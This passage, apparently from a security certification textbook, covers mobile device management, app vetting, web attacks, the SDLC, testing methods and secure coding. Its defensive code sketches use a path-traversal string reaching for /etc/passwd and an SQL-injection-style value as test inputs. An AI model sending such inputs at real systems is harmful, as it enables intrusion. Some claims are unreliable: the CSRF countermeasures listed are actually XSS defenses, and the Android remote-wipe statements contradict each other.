device that erase all the data, typically used when a device is lost
or stolen. In the case of the iPhone, this feature is closely
connected to the locater application Find My iPhone. Android phones do not come with an official remote wipe, but you can install an Android app called Lost Android that provides this capability. Once the app is installed, it works in the same way as the iPhone remote wipe. Android Device Manager provides almost identical functionality to the iPhone’s.
that comes with MDM software, and consent to remote wipe
should be required of any user who uses a mobile device in
either a BYOD or COPE environment.
SCEP
Simple Certificate Enrollment Protocol (SCEP)
provisions certificates to network devices, including mobile
devices. Because SCEP includes no provision for authenticating
the identity of the requester, two different authorization
mechanisms are used for the initial enrollment:
Manual: The requester is required to wait after submission for the
certificate authority (CA) operator or certificate officer to approve
the request.
Preshared secret: The SCEP server creates a “challenge
password” that must be somehow delivered out-of-band to the
requester and then included with the submission back to the server.
Security issues with SCEP include the fact that when the
preshared secret method is used, the challenge password is used
for authorization to submit a certificate request. It is not used
for authentication of the device.
NIST SP 800-163 Rev 1
NIST SP 800-163 Rev 1, Vetting the Security of Mobile
Applications, was written to help organizations do the
following:
Understand the process for vetting the security of mobile
applications
Plan for the implementation of an app vetting process
Develop app security requirements
Understand the types of app vulnerabilities and the testing methods
used to detect those vulnerabilities
Determine whether an app is acceptable for deployment on the
organization’s mobile devices
To provide software assurance for apps, organizations should
develop security requirements that specify, for example, how
data used by an app should be secured, the environment in
which an app will be deployed, and the acceptable level of risk
for an app. To help ensure that an app conforms to such
requirements, a process for evaluating the security of apps
should be performed.
The NIST SP 800-163 Rev 1 process is as follows:
1. Application vetting process: A sequence of activities performed
by an organization to determine whether a mobile app conforms to
the organization’s app security requirements. This process is shown
in Figure 9-1.
FIGURE 9-1 App Vetting Process
2. Application intake process: Begins when an app is received for
analysis. This process is typically performed manually by an
organization administrator or automatically by an app vetting
system. The app intake process has two primary inputs: the app
under consideration (required) and additional testing artifacts,
such as reports from previous app vetting results (optional).
3. Application testing process: Begins after an app has been
registered and preprocessed and is forwarded to one or more test
tools. A test tool is a software tool or service that tests an app for
the presence of software vulnerabilities.
4. Application approval/rejection process: Begins after a
vulnerability and risk report is generated by a test tool and made
available to one or more security analysts. A security analyst (or
analysts) inspects vulnerability reports and risk assessments from
one or more test tools to ensure that an app meets all general app
security requirements.
5. Results submission process: Begins after the final app
approval/rejection report is finalized by the authorizing official and
artifacts are prepared for submission to the requesting source.
6. App re-vetting process: App updates, and the evolving threats those updates are designed to address, can force an updated app to be evaluated as a wholly new piece of software. Depending on the risk tolerance of an organization, this can make the re-vetting of mobile apps critical for certain apps.
Web Application
Despite all efforts to design a secure web architecture, attacks
against web-based systems still occur and still succeed. This
section examines some of the more common types of attacks,
including maintenance hooks, time-of-check/time-of-use
attacks, and web-based attacks.
Maintenance Hooks
From the perspective of software development, a
maintenance hook is a set of instructions built into the code
that allows someone who knows about the so-called backdoor to
use the instructions to connect to view and edit the code without
using the normal access controls. In many cases maintenance
hooks are placed there to make it easier for the vendor to
provide support to the customer. In other cases they are placed
there to assist in testing and tracking the activities of the
product and are never removed later.
Note
The term maintenance account is often confused with maintenance hook. A
maintenance account is a backdoor account created by programmers to give
someone full permissions in a particular application or operating system. A
maintenance account can usually be deleted or disabled easily, but a true
maintenance hook is often a hidden part of the programming and much harder
to disable. Both of these can cause security issues because many attackers try
the documented maintenance hooks and maintenance accounts first. You would
be surprised at the number of computers attacked on a daily basis because
these two security issues are left unaddressed.
Regardless of how the maintenance hooks got into the code,
they can present a major security issue if they become known to
hackers who can use them to access the system.
Countermeasures on the part of the customer to mitigate the
danger are as follows:
Use a host-based IDS to record any attempt to access the system
using one of these hooks.
Encrypt all sensitive information contained in the system.
Implement auditing to supplement the IDS.
The best solution is for the vendor to remove all maintenance
hooks before the product goes into production. Code reviews
should be performed to identify and remove these hooks.
Time-of-Check/Time-of-Use Attacks
Time-of-check/time-of-use attacks attempt to take advantage of the sequence of events that occurs as the system completes common tasks. They rely on knowledge of the dependencies present when a specific series of events occurs in multiprocessing systems. By attempting to insert himself between events and introduce changes, the hacker can gain control of the result. A term often used as a synonym for a time-of-check/time-of-use attack is race condition, which is actually a different attack. In a race condition attack, the hacker inserts himself between instructions, introduces changes, and alters the order of execution of the instructions, thereby altering the outcome.
Countermeasures to these attacks are to make critical sets of
instructions atomic, which means that they either execute in
order and in entirety or the changes they make are rolled back
or prevented. It is also best for the system to lock access to
certain items it uses or touches when carrying out these sets of
instructions.
Cross-Site Request Forgery (CSRF)
Chapter 7, “Implementing Controls to Mitigate Attacks and
Software Vulnerabilities,” described cross-site scripting (XSS)
attacks. A similar attack is the cross-site request forgery
(CSRF), which causes an end user to execute unwanted actions
on a web application in which she is currently authenticated.
Unlike with XSS, in CSRF, the attacker exploits the website’s
trust of the browser rather than the other way around. The
website thinks that the request came from the user’s browser
and was actually made by the user. However, the request was
planted in the user’s browser. It usually gets there when a user
follows a URL that already contains the code to be injected. This
type of attack is shown in Figure 9-2.
Figure 9-2 CSRF
The following measures help prevent CSRF vulnerabilities in
web applications:
Using techniques such as URLEncode and HTMLEncode, encode
all output based on input parameters for special characters to
prevent malicious scripts from executing.
Filter input parameters based on special characters (those that
enable malicious scripts to execute).
Filter output based on input parameters for special characters.
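A common complementary defense not listed above is a per-session anti-CSRF token that an attacker cannot predict. Here is a minimal Python sketch of the idea; the names are illustrative, not a specific framework's API:

import hashlib
import hmac
import secrets

SERVER_SECRET = secrets.token_bytes(32)  # kept on the server only

def issue_token(session_id: str) -> str:
    """Embed this token in each form; it is bound to the user's session."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()

def is_valid(session_id: str, submitted_token: str) -> bool:
    """Reject state-changing requests whose token does not match the session."""
    return hmac.compare_digest(issue_token(session_id), submitted_token)

token = issue_token("session-abc123")
print(is_valid("session-abc123", token))    # True: request came from the real form
print(is_valid("session-abc123", "guess"))  # False: forged cross-site request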
Click-Jacking
A hacker using a click-jacking attack crafts a transparent
page or frame over a legitimate-looking page that entices the
user to click something. When the user does click, he is really
clicking on a different URL. In many cases, the site or
application may entice the user to enter credentials that could
be used later by the attacker. This type of attack is shown in
Figure 9-3.
Figure 9-3 Click-jacking
Client/Server
When a web application is developed, one of the decisions the
developers need to make is which information will be processed
on the server and which information will be processed on the
browser of the client. Figure 9-4 shows client-side processing,
and Figure 9-5 shows server-side processing. Many web
designers like processing to occur on the client side, which taxes
the web server less and enables it to serve more users. Others
shudder at the idea of sending to the client all the processing
code—and possibly information that could be useful in attacking
the server. Modern web development should be concerned with
finding the right balance between server-side and client-side
implementation. In some cases performance might outweigh
security or vice versa.
Figure 9-4 Client-Side Processing
Figure 9-5 Server-Side Processing
Embedded
An embedded system is a computer system with a dedicated
function within a larger system, often with real-time computing
constraints. It is embedded as part of the device, often including
hardware and mechanical parts. Embedded systems control
many devices in common use today and include systems
embedded in cars, HVAC systems, security alarms, and even
lighting systems. Machine-to-machine (M2M) communication,
the Internet of Things (IoT), and remotely controlled industrial
systems have increased the number of connected devices and
simultaneously made these devices targets.
Because embedded systems are usually placed within another
device without input from a security professional, security is not
even built into the device. So while allowing the device to
communicate over the Internet with a diagnostic system
provides a great service to the consumer, oftentimes the
manufacturer has not considered that a hacker can then reverse
communication and take over the device with the embedded
system. As of this writing, reports have surfaced of individuals
being able to take control of vehicles using their embedded
systems. Manufacturers have released patches that address such
issues, but not all vehicle owners have applied or even know
about the patches.
As M2M and IoT increase in popularity, security professionals
can expect to see a rise in incidents like this. A security
professional is expected to understand the vulnerabilities these
systems present and how to put controls in place to reduce an
organization’s risk.
Hardware/Embedded Device Analysis
Hardware/embedded device analysis involves using the tools
and firmware provided with devices to determine the actions
that were performed on and by the device. The techniques used
to analyze the hardware/embedded device vary based on the
device. In most cases, the device vendor can provide advice on
the best technique to use depending on what information you
need. Log analysis, operating system analysis, and memory
inspections are some of the general techniques used.
Hardware/embedded device analysis is used when mobile
devices are analyzed. For performing this type of analysis, NIST
makes the following recommendations:
Any analysis should not change the data contained on the device or
media.
Only competent investigators should access the original data and
must explain all actions they took.
Audit trails or other records must be created and preserved during
all steps of the investigation.
The lead investigator is responsible for ensuring that all these
procedures are followed.
All activities regarding digital evidence, including its seizure, access
to it, its storage, or its transfer, must be documented, preserved,
and available for review.
In Chapter 18, “Utilizing Basic Digital Forensics Techniques,”
you will learn more about forensics.
System-on-Chip (SoC)
A System-on-Chip (SoC) is an integrated circuit that
includes all components of a computer or another electronic
system. SoCs can be built around a microcontroller or a
microprocessor (the type found in mobile phones). Specialized
SoCs are also designed for specific applications. Secure SoCs
provide the key functionalities described in the following
sections.
Secure Booting
Secure booting is a series of authentication processes performed
on the hardware and software used in the boot chain. Secure
booting starts from a trusted entity (also called the anchor
point). The chip hardware booting sequence and BootROM are
the trusted entities, and they are fabricated in silicon. Hence, it
is next to impossible to change the hardware (trusted entity)
and still have a functional SoC. The process of authenticating
each successive stage is performed to create a chain of trust, as
depicted in Figure 9-6.
Figure 9-6 Secure Boot
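A toy sketch of the chain-of-trust idea in Python; the stage contents here are illustrative placeholders, and real secure boot verifies cryptographic signatures anchored in hardware rather than simple hashes in software:

import hashlib

stages = [b"bootloader image", b"OS kernel image", b"OS services image"]

# The trusted anchor (fabricated in silicon) holds the expected hash of the
# first stage; each stage in turn holds the expected hash of its successor.
trusted_hashes = [hashlib.sha256(s).digest() for s in stages]

def verify_chain(images, expected):
    """Halt the boot at the first stage whose measured hash does not match."""
    for image, trusted in zip(images, expected):
        if hashlib.sha256(image).digest() != trusted:
            return False  # chain of trust broken; do not execute this stage
    return True

print(verify_chain(stages, trusted_hashes))                            # True
print(verify_chain([b"tampered image"] + stages[1:], trusted_hashes))  # False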
Central Security Breach Response
The security breach response unit monitors security intrusions.
In the event that intrusions are reported by hardware detectors
(such as voltage, frequency, and temperature monitors), the
response unit moves the state of the SoC to nonsecure, which is
characterized by certain restrictions that differentiate it from
the secure state. Any further security breach reported to the
response unit takes the SoC to the fail state (that is, a
nonfunctional state). The SoC remains in the fail state until a
power-on-reset is issued. See Figure 9-7.
Figure 9-7 Central Security Breach Response
Firmware
Firmware is software that is stored on an erasable
programmable read-only memory (EPROM) or electrically
erasable PROM (EEPROM) chip within a device. While updates
to firmware may become necessary, they are infrequent.
Firmware can exist as the basic input/output system (BIOS) on
a computer or device.
Hardware devices, such as routers and printers, require some
processing power to complete their tasks. This software is also
contained in the firmware chips located within the devices. Like
with computers, this firmware is often installed on EEPROM to
allow it to be updated. Again, security professionals should
ensure that updates are only obtained from the device vendor
and that the updates have not been changed in any manner.
Firmware updates might be some of the more neglected but
important tasks that technicians perform. Many subscribe to
the principle “if it ain’t broke, don’t fix it.” The problem with
this approach is that in many cases firmware updates are not
designed to add functionality or fix something that doesn’t work
exactly right; rather, in many cases, they address security issues.
Computers contain a lot of firmware, all of which is potentially
vulnerable to hacking—everything from USB keyboards and
webcams to graphics and sound cards. Even computer batteries
have firmware. A simple Google search for “firmware
vulnerabilities” turns up pages and pages of results that detail
various vulnerabilities too numerous to mention. While it is not
important to understand each and every firmware vulnerability,
it is important to realize that firmware attacks are a new frontier, and the only way to protect yourself is to keep up with
the updates.
SOFTWARE DEVELOPMENT LIFE CYCLE
(SDLC) INTEGRATION
The goal of the software development life cycle (SDLC) is
to provide a predictable framework of procedures designed to
identify all requirements with regard to functionality, cost,
reliability, and delivery schedule and ensure that each is met in
the final solution. This section breaks down the steps in the
SDLC, listed next, and describes how each step contributes to
this ultimate goal. Keep in mind that steps in the SDLC can vary
based on the provider, and this is but one popular example.
Step 1. Plan/initiate project
Step 2. Gather requirements
Step 3. Design
Step 4. Develop
Step 5. Test/validate
Step 6. Release/maintain
Step 7. Certify/accredit
Step 8. Perform change management and configuration
management/replacement
Step 1: Plan/Initiate Project
In the plan/initiate step of the software development life cycle,
the organization decides to initiate a new software development
project and formally plans the project. Security professionals
should be involved in this phase to determine if information
involved in the project requires protection and if the application
needs to be safeguarded separately from the data it processes.
Security professionals need to analyze the expected results of
the new application to determine if the resultant data has a
higher value to the organization and, therefore, requires higher
protection.
Any information that is handled by the application needs a
value assigned by its owner, and any special regulatory or
compliance requirements need to be documented. For example,
healthcare information is regulated by several federal laws and
must be protected. The classification of all input and output
data of the application needs to be documented, and the
appropriate application controls should be documented to
ensure that the input and output data are protected.
Data transmission must also be analyzed to determine the types
of networks used. All data sources must be analyzed as well.
Finally, the effect of the application on organizational
operations and culture needs to be analyzed.
Step 2: Gather Requirements
In the gather requirements step of the software development
life cycle, both the functionality and the security requirements
of the solution are identified. These requirements could be
derived from a variety of sources, such as evaluating competitor
products for a commercial product or surveying the needs of
users for an internal solution. In some cases, these
requirements could come from a direct request from a current
customer.
From a security perspective, an organization must identify
potential vulnerabilities and threats. When this assessment is
performed, the intended purpose of the software and the
expected environment must be considered. Moreover, the
sensitivity of the data that will be generated or handled by the
solution must be assessed. It might be useful to assign a privacy
impact rating to the data to help guide the measures intended to
protect it from exposure.
Step 3: Design
In the design step of the software development life cycle, an
organization develops a detailed description of how the software
will satisfy all functional and security goals. It involves mapping
the internal behavior and operations of the software to specific
requirements to identify any requirements that have not been
met prior to implementation and testing.
During this process, the state of the application is determined in
every phase of its activities. The state of the application refers to
its functional and security posture during each operation it
performs. Therefore, all possible operations must be identified
to ensure that the software never enters an insecure state or acts
in an unpredictable way.
Identifying the attack surface is also a part of this analysis. The
attack surface describes what is available to be leveraged by an
attacker. The amount of attack surface might change at various
states of the application, but at no time should the attack
surface provided violate the security needs identified in the
gather requirements stage.
Step 4: Develop
The develop step is where the code or instructions that make the
software work are written. The emphasis of this phase is strict
adherence to secure coding practices. Some models that can
help promote secure coding are covered later in this chapter, in
the section “Application Security Frameworks.”
Many security issues with software are created through insecure
coding practices, such as lack of input validation or data type
checks. Security professionals must identify these issues in a
code review that attempts to assume all possible attack
scenarios and their impacts on the code. Not identifying these
issues can lead to attacks such as buffer overflows and injection
and to other error conditions.
Step 5: Test/Validate
In the test/validate step, several types of testing should occur,
including identifying both functional errors and security issues.
The auditing method that assesses the extent of the system
testing and identifies specific program logic that has not been
tested is called the test data method. This method tests not only
expected or valid input but also invalid and unexpected values
to assess the behavior of the software in both instances. An
active attempt should be made to attack the software, including
attempts at buffer overflows and denial-of-service (DoS)
attacks. Some types of testing performed at this time are
Verification testing: Determines whether the original design
specifications have been met
Validation testing: Takes a higher-level view and determines
whether the original purpose of the software has been achieved
Step 6: Release/Maintain
The release/maintenance step includes the implementation of
the software into the live environment and the continued
monitoring of its operation. At this point, as the software begins
to interface with other elements of the network, finding
additional functional and security problems is not unusual.
In many cases, vulnerabilities are discovered in the live
environment for which no current fix or patch exists. Such a flaw is
referred to as a zero-day vulnerability. Ideally, the supporting
development staff should discover such vulnerabilities before
those looking to exploit them do.
Step 7: Certify/Accredit
The certification step is the process of evaluating software for
its security effectiveness with regard to the customer’s needs.
Ratings can certainly be an input to this but are not the only
consideration. Accreditation is the formal acceptance of the
adequacy of a system’s overall security by management.
Provisional accreditation is given for a specific amount of time
and lists the changes required to the application, system, or
accreditation documentation. Full accreditation grants accreditation
without any required changes. Provisional accreditation
becomes full accreditation once all the changes are completed,
analyzed, and approved by the certifying body.
Step 8: Change Management and Configuration
Management/Replacement
After a solution is deployed in the live environment, additional
changes will inevitably need to be made to the software due to
security issues. In some cases, the software might be altered to
enhance or increase its functionality. In any case, changes must
be handled through a formal change and configuration
management process.
The purpose of this step is to ensure that all changes to the
configuration of and to the source code itself are approved by
the proper personnel and are implemented in a safe and logical
manner. This process should always ensure continued
functionality in the live environment, and changes should be
documented fully, including all changes to hardware and
software.
In some cases, it may be necessary to completely replace
applications or systems. While some failures may be fixed with
enhancements or changes, a failure may occur that can be
solved only by completely replacing the application.
DEVSECOPS
DevSecOps is a development concept that grew out of the
DevOps approach to software development. Let’s first review
DevOps.
DevOps
Traditionally, three main actors in the software development
process—development (Dev), quality assurance (QA), and
operations (Ops)—performed their functions separately, or
operated in “silos.” Work would go from Dev to QA to Ops, in a
linear fashion, as shown in Figure 9-8.
This often led to delays, finger-pointing, and multiple iterations
through the linear cycle due to an overall lack of cooperation
between the units.
FIGURE 9-8 Traditional Development
DevOps aims at shorter development cycles, increased
deployment frequency, and more dependable releases, in close
alignment with business objectives. It encourages the three
units to work together through all phases of the development
process. Figure 9-9 shows a Venn diagram that represents this
idea.
Figure 9-9 DevOps
While DevOps was created to develop a better working
relationship between development, QA, and operations,
encouraging a sense of shared responsibility for successful
functionality, DevSecOps simply endeavors to bring the security
group into the tent as well and create a shared sense of
responsibility in all three groups with regard to security. As
depicted in Figure 9-10, the entire DevSecOps process is
wrapped in security, implying that security must be addressed
at every development step.
FIGURE 9-10 DevSecOps
SOFTWARE ASSESSMENT METHODS
During the testing phase of the SDLC, various
assessment methods can be used. Among them are user
acceptance testing, stress testing applications, security
regression testing, and code review. The following sections dig
into how these assessment methods operate.
User Acceptance Testing
While it is important to make web applications secure, in some
cases security features make an application unusable from the
user perspective. User acceptance testing (UAT) is
designed to ensure that this does not occur. Keep the following
guidelines in mind when designing user acceptance testing:
Perform the testing in an environment that mirrors the live
environment.
Identify real-world use cases for execution.
Select UAT staff from various internal departments.
Stress Test Application
While the goal of many types of testing is locating security
issues, the goal of stress testing is to determine the workload
that the application can withstand. These tests should be
performed in a certain way and should always have defined
objectives before testing begins. You will find many models for
stress testing, but one suggested order of activities is as follows:
Step 1. Identify test objectives in terms of the desired
outcomes of the testing activity.
Step 2. Identify key scenario(s)—the cases that need to be
stress tested (for example, test login, test searching,
test checkout).
Step 3. Identify the workload that you want to apply (for
example, simulate 300 users).
Step 4. Identify the metrics you want to collect and what
form these metrics will take (for example, time to
complete login, time to complete search).
Step 5. Create test cases. Define steps for running a single
test, as well as your expected results (for example, Step
1: Select a product; Step 2: Add to cart; Step 3: Check
out).
Step 6. Simulate load by using test tools (for example,
attempt 300 sessions).
Step 7. Analyze results.
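To make steps 3 through 7 concrete, here is a hedged Python sketch that simulates concurrent sessions against a hypothetical local endpoint and collects a simple timing metric; a real load tool would add ramp-up, think time, and richer reporting:

# Minimal load-simulation sketch for the steps above. The target URL is
# a hypothetical test endpoint, and the workload is scaled down.
import time
from concurrent.futures import ThreadPoolExecutor
from urllib.request import urlopen

TARGET = "http://localhost:8000/login"   # hypothetical endpoint (step 2)
SESSIONS = 30                            # step 3: workload to apply

def run_session(_):
    start = time.monotonic()
    try:
        urlopen(TARGET, timeout=10).read()
        ok = True
    except Exception:
        ok = False
    return ok, time.monotonic() - start  # step 4: time-to-complete metric

with ThreadPoolExecutor(max_workers=SESSIONS) as pool:  # step 6: simulate load
    results = list(pool.map(run_session, range(SESSIONS)))

times = [t for ok, t in results if ok]                  # step 7: analyze
print(f"completed: {len(times)}/{SESSIONS}")
if times:
    print(f"avg: {sum(times)/len(times):.3f}s  max: {max(times):.3f}s")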
Security Regression Testing
Regression testing is done to verify functionality after making a
change to the software. Security regression testing is a
subset of regression testing that validates that changes have not
reduced the security of the application or opened new
weaknesses. This testing should be performed by a different
group than the group that implemented the change. It can occur
in any part of the development process and includes the
following types:
Unit regression: This type tests the code as a single unit.
Interactions and dependencies are not tested.
Partial regression: With this type, new code is made to interact
with other parts of older existing code.
Complete regression: This type is the final step in regression
testing and performs testing on all units.
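As a concrete illustration, here is a hedged Python sketch of a security regression test. The safe_join() function stands in for a hypothetical helper that was patched earlier; the tests verify the old weakness stays closed and normal behavior still works:

# Hedged sketch of security regression testing. safe_join() is a
# hypothetical, previously patched helper, not from the text.
import os

def safe_join(base: str, user_path: str) -> str:
    # Patched earlier to reject path traversal outside the base directory.
    base = os.path.abspath(base)
    full = os.path.abspath(os.path.join(base, user_path))
    if not full.startswith(base + os.sep):
        raise ValueError("path traversal rejected")
    return full

def test_traversal_still_rejected():
    # The finding that prompted the original patch must never reopen.
    try:
        safe_join("/srv/files", "../../etc/passwd")
        raise AssertionError("regression: traversal accepted")
    except ValueError:
        pass

def test_normal_paths_still_work():
    assert safe_join("/srv/files", "report.txt").endswith("report.txt")

test_traversal_still_rejected()
test_normal_paths_still_work()
print("security regression checks passed")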
Code Review
Code review is the systematic investigation of the code for
security and functional problems. It can take many forms, from
simple peer review to formal code review. There are two main
types of code review:
Formal review: This is an extremely thorough, line-by-line
inspection, usually performed by multiple participants using
multiple phases. This is the most time-consuming type of code
review but the most effective at finding defects.
Lightweight review: This type of code review is much more
cursory than a formal review. It is usually done as a normal part of
the development process. It can happen in several forms:
Pair programming: Two coders work side by side, checking
one another’s work as they go.
E-mail review: Code is e-mailed around to colleagues for them
to review when time permits.
Over the shoulder: Coworkers review the code while the
author explains his or her reasoning.
Tool-assisted: Using automated testing tools is perhaps the
most efficient method.
Security Testing
Security testing approaches are commonly categorized by how much
knowledge of the application the testing team is given:
Black-box testing, or zero-knowledge testing: The team is
provided with no knowledge regarding the organization’s
application. The team can use any means at its disposal to obtain
information about the organization’s application. This is also
referred to as closed testing.
White-box testing: The team goes into the process with a deep
understanding of the application or system. Using this knowledge,
the team builds test cases to exercise each path, input field, and
processing routine.
Gray-box testing: The team is provided more information than in
black-box testing, while not as much as in white-box testing. Gray-box
testing has the advantage of being nonintrusive while
maintaining the boundary between developer and tester. On the
other hand, it may not uncover some of the problems that would be
discovered with white-box testing.
Table 9-2 compares black-box, gray-box, and white-box testing.
Table 9-2 Comparing Black-Box, Gray-Box, and White-Box
Testing
Black Box: Internal workings of the application are not known.
Also called closed-box, data-driven, or functional testing.
Performed by end users, testers, and developers. Least
time-consuming.
Gray Box: Internal workings of the application are somewhat known.
Also called translucent testing, as the tester has partial
knowledge. Performed by end users, testers, and developers. More
time-consuming than black-box testing but less so than white-box
testing.
White Box: Internal workings of the application are fully known.
Also known as clear-box, structural, or code-based testing.
Performed by testers and developers. Most exhaustive and
time-consuming.
While code review is most typically performed on in-house
applications, it may be warranted in other scenarios as well. For
example, say that you are contracting with a third party to
develop a web application to process credit cards. Considering
the sensitive nature of the application, it would not be unusual
for you to request your own code review to assess the security of
the product.
In many cases, more than one tool should be used in testing an
application. For example, an online banking application that
has had its source code updated should undergo both
penetration testing with accounts of varying privilege levels and
a code review of the critical modules to ensure that defects do not
exist.
Code Review Process
Code review varies from organization to organization. Fagan
inspections are the most formal code reviews that can occur and
should adhere to the following process:
1. Plan
2. Overview
3. Prepare
4. Inspect
5. Rework
6. Follow-up
Most organizations do not strictly adhere to the Fagan
inspection process. Each organization should adopt a code
review process fitting for its business requirements. The more
restrictive the environment, the more formal the code review
process should be.
SECURE CODING BEST PRACTICES
Earlier this chapter covered software development security best
practices. In addition to those best practices, developers should
follow the secure coding best practices covered in the following
sections.
Input Validation
Many attacks arise because a web application has not validated
the data entered by the user (or hacker). Input validation is
the process of checking all input for issues such as proper
format and proper length. In many cases, these validators use
either blacklisting or whitelisting of characters or patterns.
Blacklisting looks for characters or patterns to block, which can
be prone to rejecting legitimate requests. Whitelisting looks for
allowable characters or patterns and allows only those (see the
sketch later in this section). Input validation tools fall into
several categories:
Cloud-based services
Open source tools
Proprietary commercial products
Because these tools vary in the amount of skill required, the
choice should be made based on the skill sets represented on
the cybersecurity team. A fancy tool that no one knows how to
use is not an effective tool.
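As a minimal illustration of the whitelisting approach (the sketch promised above), the following Python validator accepts only a hypothetical pattern of letters, digits, and hyphens up to 32 characters; the field format is assumed for illustration:

# Minimal whitelisting input-validation sketch.
import re

ALLOWED = re.compile(r"^[A-Za-z0-9-]{1,32}$")  # whitelist pattern

def is_valid(value: str) -> bool:
    # Whitelisting: accept only known-good characters and lengths rather
    # than trying to enumerate every dangerous pattern (blacklisting).
    return ALLOWED.match(value) is not None

print(is_valid("order-12345"))       # True
print(is_valid("1; DROP TABLE x"))   # False: characters outside whitelist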
Output Encoding
Encoding is the process of changing data into another form
using code. When this process is applied to output, it is done to
prevent the inclusion of dangerous character types that might
be inserted by malicious individuals. When processing
untrusted user input for (web) applications, filter the input and
encode the output. That is the most widely given advice to
prevent (server-side) injections. Some common types of output
encoding include the following:
URL encoding: A method to encode information in a Uniform
Resource Identifier. There’s a set of reserved characters, which have
special meaning, and a set of unreserved characters, which
are safe to use. If a character is reserved, then the character is
encoded using the percent (%) sign, followed by its hexadecimal
digits.
Unicode: A standard for encoding, representing and handling
characters in most (if not all) languages. Best known is the UTF-8
character encoding standard, which is a variable-length encoding (1,
2, 3, or 4 units of 8 bits, hence the name UTF-8).
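Both encodings described above are available in the Python standard library. The following minimal sketch (illustrative values only) shows reserved characters becoming percent-escaped hexadecimal digits, and the variable byte lengths of UTF-8:

# Sketch of the two encoding types described above.
from urllib.parse import quote

# URL encoding: reserved characters become %-escaped hexadecimal digits.
print(quote("a=1&b=two words", safe=""))   # a%3D1%26b%3Dtwo%20words

# UTF-8: a variable-length Unicode encoding (1 to 4 bytes per character).
for ch in ("A", "é", "€"):
    print(ch, ch.encode("utf-8"))          # 1, 2, and 3 bytes, respectively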
Session Management
Session management ensures that any instance of identification
and authentication to a resource is managed properly. This
includes managing desktop sessions and remote sessions.
Desktop sessions should be managed through a variety of
mechanisms. Screensavers allow computers to be locked if left
idle for a certain period of time. To reactivate a computer, the
user must log back in. Screensavers are a timeout mechanism,
and other timeout features may also be used, such as shutting
down or placing a computer in hibernation after a certain
period. Session or logon limitations allow organizations to
configure how many concurrent sessions a user can have.
Schedule limitations allow organizations to configure the time
during which a user can access a computer.
Remote sessions usually incorporate some of the same
mechanisms as desktop sessions. However, remote sessions do
not occur at the computer itself. Rather, they are carried out
over a network connection. Remote sessions should always use
secure connection protocols. In addition, if users will be
remotely connecting only from certain computers, the
organization may want to implement some type of rule-based
access control that allows only certain connections.
Authentication
If you have no authentication, you have no security and no
accountability. This section covers some authentication topics.
Context-based Authentication
Context-based authentication is a form of authentication that
takes multiple factors or attributes into consideration before
authenticating and authorizing an entity. So rather than simply
rely on the presentation of proper credentials, the system looks
at other factors when making the access decision, such as time
of day or location of the subject. Context-based security solves
many issues suffered by non-context-based systems. The
following are some of the key solutions it provides:
Helps prevent account takeovers made possible by simple password
systems
Helps prevent many attacks made possible by the increasing use of
personal mobile devices
Helps prevent many attacks made possible by the user’s location
Context-based systems can take a number of factors into
consideration when a user requests access to a resource. In
combination, these attributes can create a complex set of
security rules that can help prevent vulnerabilities that
password systems may be powerless to detect or stop. The
following sections look at some of these attributes.
Time
Cybersecurity professionals have for quite some time been able
to prevent access to a network entirely by configuring login
hours in a user’s account profile. However, they have not been
able to prevent access to individual resources on a time-of-day
basis until recently. For example, you might want to allow Joe
to access the sensitive Sales folder during the hours of 9 a.m. to
5 p.m. but deny him access to that folder during other hours. Or
you might configure the system so that when Joe accesses
resources after certain hours, he is required to give another
password or credential (a process often called step-up
authentication) or perhaps even have a text code sent to his e-mail address that must be provided to allow this access.
Location
At one time, cybersecurity professionals knew that all the
network users were safely in the office and behind a secure
perimeter created and defended with every tool possible. That is
no longer the case. Users now access your network from home,
wireless hotspots, hotel rooms, and all sorts of other locations
that are less than secure. When you design authentication, you
can consider the physical location of the source of an access
request. A scenario for this might be that Alice is allowed to
access the Sales folder at any time from the office, but only from
9 a.m. to 5 p.m. from her home and never from elsewhere.
Authentication systems can also use location to identify
requests to authenticate and access a resource from two
different locations in a very short amount of time, one of which
could be fraudulent. Finally, these systems can sometimes make
real-time assessments of threat levels in the region where a
request originates.
Frequency
A context-based system can make access decisions based on the
frequency with which the requests are made. Because multiple
login requests arriving very quickly can indicate a password-cracking attack, the system can use this information to deny
access. It also can indicate that an automated process or
malware, rather than an individual, is attempting this
operation.
Behavioral
It is possible for authentication systems to track the behavior of
an individual over time and use this information to detect when
an entity is performing actions that, while within the rights of
the entity, differ from the normal activity of the entity. This
could be an indication that the account has been compromised.
The real strength of an authentication system lies in the way you
can combine the attributes just discussed to create very
granular policies such as the following: Gene can access the
Sales folder from 9 a.m. to 5 p.m. if he is in the office and is
using his desktop device, but can access the folder only from 10
a.m. to 3 p.m. if he is using his smartphone in the office, and
cannot access the folder at all from 9 a.m. to 5 p.m. if he is
outside the office.
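A minimal Python sketch of the "Gene" policy above, with the attribute names and request structure assumed for illustration (and the outside-the-office case simplified to a blanket deny):

# Hedged sketch of a context-based access rule; names are illustrative.
def gene_can_access_sales(hour: int, location: str, device: str) -> bool:
    if location == "office" and device == "desktop":
        return 9 <= hour < 17      # 9 a.m. to 5 p.m. in the office
    if location == "office" and device == "smartphone":
        return 10 <= hour < 15     # 10 a.m. to 3 p.m. on a smartphone
    return False                   # simplification: deny elsewhere

print(gene_can_access_sales(10, "office", "desktop"))     # True
print(gene_can_access_sales(16, "office", "smartphone"))  # False
print(gene_can_access_sales(11, "home", "desktop"))       # False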
The main security issue is that the complexity of the rule
creation can lead to mistakes that actually reduce security. A
complete understanding of the system is required, and special
training should be provided to anyone managing the system.
Other security issues include privacy issues, such as user
concerns about the potential misuse of information used to
make contextual decisions. These concerns can usually be
addressed through proper training about the power of context-based security.
Network Authentication Methods
One of the protocol choices that must be made in creating a
remote access solution is the authentication protocol. The
following are some of the most important of those protocols:
Password Authentication Protocol (PAP): PAP provides
authentication, but the credentials are sent in cleartext and can be
read with a sniffer.
Challenge Handshake Authentication Protocol (CHAP):
CHAP solves the cleartext problem by operating without sending
the credentials across the link. The server sends the client a set of
random text called a challenge. The client hashes the text together
with the password and sends the result back. The server then
performs the same computation using the password it has stored and
compares the two results. If the results match, the server can be
assured that the user or system possesses the correct password
without ever needing to send it across the untrusted network (see
the sketch after this list). Microsoft has created its
own variants of CHAP:
MS-CHAP v1: This is the first version of a variant of CHAP by
Microsoft. This protocol works only with Microsoft devices, and
while it stores the password more securely than CHAP, like any
other password-based system, it is susceptible to brute-force and
dictionary attacks.
MS-CHAP v2: This update to MS-CHAP provides stronger
encryption keys and mutual authentication, and it uses different
keys for sending and receiving.
Extensible Authentication Protocol (EAP): EAP is not a
single protocol but a framework for port-based access control that
uses the same three components that are used in RADIUS. A wide
